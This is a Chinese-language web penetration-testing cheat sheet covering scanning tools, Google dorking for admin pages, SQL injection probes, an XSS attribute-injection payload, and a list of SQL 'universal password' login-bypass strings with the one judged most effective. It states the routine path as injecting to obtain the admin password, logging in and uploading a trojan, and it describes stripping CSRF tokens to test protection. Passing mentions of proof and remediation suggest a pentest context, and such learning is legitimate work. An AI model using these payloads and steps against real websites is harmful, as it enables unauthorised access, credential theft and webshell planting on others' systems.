1.WVS扫描器
2.目录扫描器
3.nmap扫端口
google黑客
site:网站域名 inurl:admin
链接是否有id传值:要尝试 sql注入和传参
SQL注入
如果是整数:
?id=79-0
?id=79-1
超过7位的数字,一般都是字符
如果是参数:
?id=abc'%2b'
?id=abc'%2b'a
搜索型方法
2011%' and '%'=' 实际情况<%2011% and '%'='%'>
2011%' and '%'='a
跨站:测试双引号是否被过滤
"121
查看源代码是否有"返,121数字是为了方便在源代码中查找。
如果尖括号被屏蔽可以尝试
" onkeyup=alert(/xss/);b="
然后输入a 看是否有弹出
JS交互没有SQL注入 尝试XSS
网站后台
弱密码
万能密码
最短的:‘or’1
'or'='or'
1'or'1'='1–
'or''='
"or=or"
'or''=''or''='
'or'='or'
'or'='1'
'or' '1'='1'
or 'a'='a'
'or'a'='a–
'or'='or'
经验证,'or''=''or''='的效果是最好的!
暴力破解
SQL注入
找回密码功能,查看是否将不同的用户修改密码发送到不同人的地址
登陆成功的情况下查看cookie 是否有防护
后台目录扫描工具:
1.后台登陆地址
2.编辑器
3.找木马
nmap:
旁站
常规思路 注入拿到管理密码,登陆后台,上传木马
SQL注入另类应用:差异备份
常见漏洞
间接信任攻击:CSRF URL重定向
dump的东西 文件包含 路径遍历
渗透用 WVS
安全检测 appscan
上传 CSRF 模块 不安全对象引用是扫不出来的
1.SQL注入
2.XSS
3.上传 前端上传 后端上传
4.CSRF(是在后台登陆的情况下) 资料修改 发布留言 只要可以破坏别人东西的都属于CSRF 如果存在验证码就不用猜了
CSRF防护有两种 验证码和token 可以截包后删除token看是否还可以修改用。
漏洞证明过程
漏洞的修复建议
5.命令执行漏洞
截包看命令
struts 2 存在于Java环境
tomecat
cgi漏洞 存在于php环境
6. 不安全对象引用
7.URL重定向
8.文件包含 目录遍历
9.模块缺陷 –属于权限绕过的漏洞 (如忘记密码, 校验码什么的 文章编辑)
判断模块
10 目录浏览 本来应该是403的成了200 例如 http://xxx.com/admin 列出相关信息